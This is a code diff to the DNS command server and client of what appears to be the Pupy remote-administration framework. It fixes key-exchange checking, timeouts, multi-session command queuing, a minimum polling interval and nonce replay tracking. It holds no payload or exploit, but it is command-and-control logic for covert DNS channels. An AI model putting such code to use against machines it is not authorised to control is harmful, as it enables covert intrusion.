diff --git a/pupy/network/lib/picocmd/client.py b/pupy/network/lib/picocmd/client.py index 3eaf27bc..e3938163 100644 --- a/pupy/network/lib/picocmd/client.py +++ b/pupy/network/lib/picocmd/client.py @@ -188,7 +188,7 @@ class DnsCommandsClient(Thread): request = self.encoder.generate_kex_request() kex = Kex(request) response = self._request(kex) - if not len(response) == 1 and not isinstance(response[0], Kex): + if not len(response) == 1 or not isinstance(response[0], Kex): logging.error('KEX sequence failed. Got {} instead of Kex'.format( response)) return diff --git a/pupy/network/lib/picocmd/server.py b/pupy/network/lib/picocmd/server.py index 599afa7f..482f7924 100644 --- a/pupy/network/lib/picocmd/server.py +++ b/pupy/network/lib/picocmd/server.py @@ -74,7 +74,7 @@ class DnsCommandServerException(Exception): return str(self.error) class DnsCommandServerHandler(BaseResolver): - def __init__(self, domain, key, recursor=None, timeout=10): + def __init__(self, domain, key, recursor=None, timeout=None): self.sessions = {} self.domain = domain self.recursor = recursor @@ -93,7 +93,7 @@ class DnsCommandServerHandler(BaseResolver): self.interval = 30 self.kex = True - self.timeout = timeout + self.timeout = timeout or self.interval*3 self.commands = [] self.lock = RLock() self.finished = Event() @@ -127,14 +127,22 @@ class DnsCommandServerHandler(BaseResolver): self.commands.append(command) if session: - session = self.find_sessions(spi=session) or \ + sessions = self.find_sessions(spi=session) or \ self.find_sessions(node=session) - if not session: + if not sessions: return 0 - session.add_command(command) - return 1 + count = 0 + if type(sessions) in (list, tuple): + for session in sessions: + session.add_command(command) + count += 1 + else: + count = 1 + sessions.add_command(command) + + return count else: count = 0 for session in self.find_sessions(): @@ -153,14 +161,22 @@ class DnsCommandServerHandler(BaseResolver): self.commands = [] if session: - session = self.find_sessions(spi=session) or \ + sessions = self.find_sessions(spi=session) or \ self.find_sessions(node=session) - if not session: + if not sessions: return 0 - session.commands = [] - return 1 + count = 0 + if type(sessions) in (list, tuple): + for session in sessions: + session.commands = [] + count += 1 + else: + count = 1 + sessions.commands = [] + + return count else: count = 0 for session in self.find_sessions(): @@ -179,20 +195,23 @@ class DnsCommandServerHandler(BaseResolver): elif spi: return self.sessions.get(spi) elif node: - for session in self.sessions.itervalues(): - if session.system_info and session.system_info['node'] == node: - return session - - return None + return [ + session for session in self.sessions.itervalues() \ + if session.system_info and \ + session.system_info['node'] == node + ] @locked - def set_policy(self, kex=True, timeout=10*60, interval=60): + def set_policy(self, kex=True, timeout=None, interval=None): if kex == self.kex and self.timeout == timeout and self.interval == self.interval: return + if interval and interval < 30: + raise ValueError('Interval should not be less then 30s to avoid DNS storm') + self.interval = interval or self.interval - self.kex = kex if not kex is None else self.kex - self.timeout = max(timeout, interval*3) or self.timeout + self.timeout = max(timeout, self.interval*3) if timeout else self.timeout + self.kex = kex if ( not kex is None ) else self.kex cmd = Policy(self.interval, self.kex) return self.add_command(cmd) @@ -351,7 +370,7 @@ class DnsCommandServerHandler(BaseResolver): try: request, session, nonce = self._q_page_decoder(qname) - if session and session.last_nonce: + if session and session.last_nonce and session.last_qname: if nonce < session.last_nonce: logging.info('Ignore nonce from past: {} < {}'.format( nonce, session.last_nonce)) @@ -369,6 +388,7 @@ class DnsCommandServerHandler(BaseResolver): if session: session.last_nonce = nonce + session.last_qname = qname except DnsCommandServerException as e: nonce = e.nonce